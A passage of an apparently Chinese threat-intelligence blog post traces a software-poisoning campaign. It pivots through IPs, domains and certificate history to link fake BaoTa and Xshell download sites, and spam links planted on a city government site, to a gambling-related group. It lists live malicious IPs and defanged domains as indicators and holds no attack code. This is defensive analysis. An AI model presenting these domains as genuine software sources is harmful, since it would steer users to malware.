地址，不知道是为了防止监管还是为了防止安全厂商，或者是百度爬虫之类的。</span></p><p><img data-imgfileid="100001594" class="rich_pages wxw-img" data-ratio="0.3773946360153257" data-s="300,640" data-type="png" data-w="3132" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=c93ecec4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9eTD5f4t0oaIicjtmeLAibyAlTjyicibMMcg2jSsyqA4LEbKiczehByVwDIQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">Fofa 试着搜了下，看上去负责 SEO 的同事狠狠的工作了（南非的 IP 是 fofa 识别不准确）。</span></p><p><img data-imgfileid="100001595" class="rich_pages wxw-img" data-ratio="0.7647058823529411" data-s="300,640" data-type="png" data-w="2346" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=aaebf1c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9CEG9Jb89mTGEGFb5eLSIQKC15AFjDicCbuCqiaPAIJiceY925L4JINnGA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">XX会大关联</span></span><span style="display: none;"></span></h4><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">cq2381c.icu</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">还记得 154.19.200.212 反查出的 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">cq2381c[.]icu</span></code><span leaf=""> 么， </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">cq2381c[.]icu</span></code><span leaf="">  有一个子域名 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">r.cq2381c[.]icu</span></code><span leaf=""> 解析到  20.239.164.229。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">根据XX市政府被挂的黑链跳转域名 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">r.18pk[.]com</span></code><span leaf="">  那里得到的信息，我们大胆猜一下 URI ，这不就对上了。</span></p><p><img data-imgfileid="100001596" class="rich_pages wxw-img" data-ratio="0.5914893617021276" data-s="300,640" data-type="png" data-w="2350" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=c386a4d3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9TiaHthT0Ar1CIDp1yBXQiaAvGLQiayUia5Piao77QyBNoia7Eca5c0PEjTNw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">所以说 154.19.200.212 上不仅有 &#34;解析但无服务配置的</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jiXXXXn519[.]com</span></code><span leaf="">&#34;、&#34;解析但跳转登录页的 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jXX88[.]net</span></code><span leaf="">&#34;，还有疑似为黑链准备的域名 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">cq2381c[.]icu</span></code><span leaf=""> ，业务包圆了。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">VT 继续搜索 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">r.cq2381c[.]icu</span></code><span leaf=""> 当前解析的 20.239.164.229，也可以发现一堆其他XX会相关域名。</span></p><p><img data-imgfileid="100001597" class="rich_pages wxw-img" data-ratio="0.5259326660600546" data-s="300,640" data-type="png" data-w="2198" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f85899ec&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9O07lyViaYhIA8bWtxx78URHC3owddVCu2o5G7Z4hhEUTfo5k71BGgcg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">随便访问个试试，还接入了 360 的 CDN 产品是什么鬼。</span></p><p><img data-imgfileid="100001598" class="rich_pages wxw-img" data-ratio="0.4542794440380395" data-s="300,640" data-type="png" data-w="2734" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=248fb68c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9WicI0BDITRTwmY1YLu8ZPPzpLZDXjiaOlbcnljyRoKHjj0gbqgtarGOw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">Hunter 这边的数据可以看到不是个例。</span></p><p><img data-imgfileid="100001600" class="rich_pages wxw-img" data-ratio="0.5291700903861956" data-s="300,640" data-type="png" data-w="2434" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f8f9b1c0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY91MAq1wpibwwz3wvFVQcr556K4liaIlzKSsRC3eibWORRibQMlicyicXs8ZuQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">20.239.164.229 还能关联出来一个 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">jXXvip.cc</span></code><span leaf="">  的子域名 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">yixie8.jXXvip[.]cc</span></code><span leaf=""> ，历史 IP 关联 154.221.24.55。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">154.221.24.55 可以关联到  </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">www.bao-ta[.]co</span></code><span leaf=""> 域名的证书，也存在历史的解析关联。</span></p><p><img data-imgfileid="100001599" class="rich_pages wxw-img" data-ratio="0.23630504833512353" data-s="300,640" data-type="png" data-w="1862" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=0e7d2f0f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9kzhQ4kknibVeiabmSfVAXWib7aJhltYQGUp0t1T0pkINzmnbW3W3fqxrA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而  </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">www.bao-ta[.]co</span></code><span leaf=""> 是一个至今还存活着的假冒宝塔官网 ......</span></p><p><img data-imgfileid="100001602" class="rich_pages wxw-img" data-ratio="0.5212765957446809" data-s="300,640" data-type="png" data-w="3196" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=9116f883&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9qSZDBFNhickQUENRIbdzHBEPpTFjcicWcIQS6WiawXAxTia2Q2JicjibeIWg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">216.83.52.155的证书时间</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">216.83.52.155（前面讲过的枢纽 IP） 这个IP第一次可观测到的跟投毒操作有实锤关联的时间是2023-02-12。</span></p><p><img data-imgfileid="100001601" class="rich_pages wxw-img" data-ratio="0.5197368421052632" data-s="300,640" data-type="png" data-w="2432" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=45e35f24&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9PqfiatcSm2cicicgmazMlMuXMRJW0Klf7l6NlQYd7TtXwpwMFye2uKeJw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">根据测绘记录的结果来看，IP在沉寂相当一段时间后在 2023-01-15 开了个宝塔。</span></p><p><img data-imgfileid="100001603" class="rich_pages wxw-img" data-ratio="0.5120663650075414" data-s="300,640" data-type="png" data-w="2652" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=15c1832c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9mSoj6AJjAuibW5VuGLb2SOPYp8uOTCZKfllC9uv8ba492CSOwX8pPLw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而 IP 在 2023-01-20 就被 VT 记录到有  jiXXXXnhui.vip 的证书关联。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">当然这里直接下定论说最开始的宝塔可能默认用了XX会的证书太武断，但是至少在时间关系上来看，投毒域名的出现紧随XX会证书出现之后。</span></p><p><img data-imgfileid="100001605" class="rich_pages wxw-img" data-ratio="0.4957983193277311" data-s="300,640" data-type="png" data-w="1904" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=13d65a4c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9hNW5btKLuzX29dfC8qQqgC1Bwia51NGpaG3skylHPOXLYlgoPMZBTKg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">xshelldierban[.]com</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">VT 上 macyy.cn 的子域名关联，就那么几个。</span></p><p><img data-imgfileid="100001604" class="rich_pages wxw-img" data-ratio="0.22735042735042735" data-s="300,640" data-type="png" data-w="2340" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=92c78338&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9DvrsS8BYunph3oWFRV9kdfUGoBdTz5v8PZ9iaKic2nX1ibT7INaXBkMMw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">追踪 216.83.52.147 的历史解析记录，发现几个假冒 xshell 官网的域名。</span></p><p><img data-imgfileid="100001606" class="rich_pages wxw-img" data-ratio="0.38562664329535495" data-s="300,640" data-type="png" data-w="2282" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=6847cb3e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9XPUkX11JeoJyIDI1OdoStvJ0SS7uAyMMK2oCzrtVUExaDOtHxAUic2w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">其中 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">xshelldierban[.]com</span></code><span leaf="">  历史解析 IP：23.225.158.98、216.83.52.147。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">在 2023-01-20 历史证书关联XX会。</span></p><p><img data-imgfileid="100001607" class="rich_pages wxw-img" data-ratio="0.2271186440677966" data-s="300,640" data-type="png" data-w="1770" type="block" 